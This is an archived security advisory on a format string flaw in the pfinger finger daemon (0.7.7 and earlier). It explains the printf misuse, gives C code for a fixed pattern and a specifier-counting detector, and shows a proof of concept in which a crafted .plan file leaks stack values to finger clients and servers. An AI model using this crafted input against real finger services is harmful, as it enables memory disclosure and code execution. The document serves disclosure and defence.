21st Dec 2001 [SBWID-4952]
COMMAND
pfinger format string vulnerability
SYSTEMS AFFECTED
pfinger <= 0.7.7
PROBLEM
A format string vulnerability in pfinger, a finger daemon, has been
discovered and published in INTEXXIA SECURITY ADVISORY ID #1050-181201,
by Guillaume Pelat.
Both client and server are vulnerable to a format string injection,
for example through a '.plan' file.
Client side: the client passes the data received from the server directly
as the first (format) argument of printf(3). A user could create a
specially crafted '.plan' file that would be printed by the pfinger
client. As a result, it could be possible to execute arbitrary code in
the context of the client.
Server side: if the server is configured to connect to a master server
(with the <sitehost> directive), the data received from the master server
is used directly as the first argument of printf(3). If a malicious user
modifies the master so that it sends crafted data, it is possible to
execute code on the vulnerable 'slave' server.
If a user has an account on the master server, he can create a crafted
'.plan' file containing the format string. A simple request to the
'client' server would then also exploit the server side vulnerability.
The pfinger daemon is launched with 'nobody' permissions by default.
Complete exploitation of this vulnerability will permit an attacker
to execute code with the 'nobody' permissions. This flaw could then be
used to compromise the local system by exploiting other local vulnerabilities.
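The root cause described above is the classic misuse of printf(3): untrusted text (a '.plan' file, or data from the master server) is handed over as the format string instead of as an argument. The following C snippet is an added illustration, not code from pfinger or from the advisory; it shows the vulnerable call pattern as a comment, the corrected pattern with a constant format string, and a small defender-side helper that counts conversion specifiers in untrusted text so that such input can be logged. The function names and the sample .plan line are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

/* Constructed sample, modelled on the .plan line quoted in the advisory. */
static const char SAMPLE_PLAN[] = "Now a little format string: %p %p %p :-)";

/*
 * VULNERABLE pattern (shown as a comment so the file compiles cleanly even
 * with -Werror=format-security):
 *
 *     printf(plan);            // 'plan' came from a file or the network
 *
 * Every "%p" in 'plan' is interpreted as a conversion and reads a value off
 * the stack, which is exactly what the advisory's proof of concept shows.
 */

/*
 * FIXED pattern: the format string is a compile-time constant and the
 * untrusted text is passed only as a "%s" argument. snprintf is used here so
 * the rendered output can be inspected; fputs/printf("%s", plan) are
 * equivalent for direct output. Returns the length snprintf reports.
 */
static int render_plan(const char *plan, char *out, size_t outlen)
{
    return snprintf(out, outlen, "Plan:\n%s\n", plan);
}

/*
 * Defender-side check: count printf conversion specifiers in untrusted text.
 * "%%" is a literal percent sign and is not counted; a lone trailing '%' is
 * ignored. A non-zero count on .plan contents or on data received from a
 * master server is worth logging. This is a detection aid, not the fix; the
 * fix is the constant format string in render_plan().
 */
static int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p != '\0'; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* escaped percent sign */
            p++;
            continue;
        }
        if (p[1] == '\0')       /* dangling '%' at end of string */
            break;
        n++;
    }
    return n;
}

int main(void)
{
    char buf[256];

    render_plan(SAMPLE_PLAN, buf, sizeof buf);
    fputs(buf, stdout);      /* the %p sequences are printed literally */

    printf("format directives in sample: %d\n",
           count_format_directives(SAMPLE_PLAN));
    return 0;
}
```

Run as written, the sample line is echoed verbatim (the three "%p" remain text rather than being expanded) and the helper reports three conversion specifiers, which is the signal a finger daemon could log when reading a user's .plan file or a reply from a peer.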
PROOF OF CONCEPT
Here are two proofs of concept, one for each side.
Client side :
evil@test:~$ cat ~/.plan
Now a little format string: %p %p %p :-)
evil@test:~$
good@test:~$ finger -l evil
Login Name: evil In real life: Evil
Login Name Status Login time Host
evil Evil active Mon 08:02 test
No mail.
Plan:
Now a little format string: 0x8049da0 0x640 0x400a252d :-)
good@test:~$
Server side :
good@test:~$ cat /etc/fingerconf
<fingerconf>
<sitehost>master</sitehost>
</fingerconf>
evil@master:~$ cat ~/.plan
Now a little format string: %p %p %p :-)
evil@master:~$ telnet test 79
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
/W evil
Login Name: evil In real life: Evil
Login Name Status Login time Host
evil Evil active Mon 08:02 master
No mail.
Plan:
Now a little format string: 0xbfbff860 0x400 0x0 :-)
Connection closed by foreign host.
evil@master:~$
SOLUTION
A new version has been released which corrects this security issue.
pfinger version 0.7.8 is available at:
http://www.xelia.ch/unix/pfinger/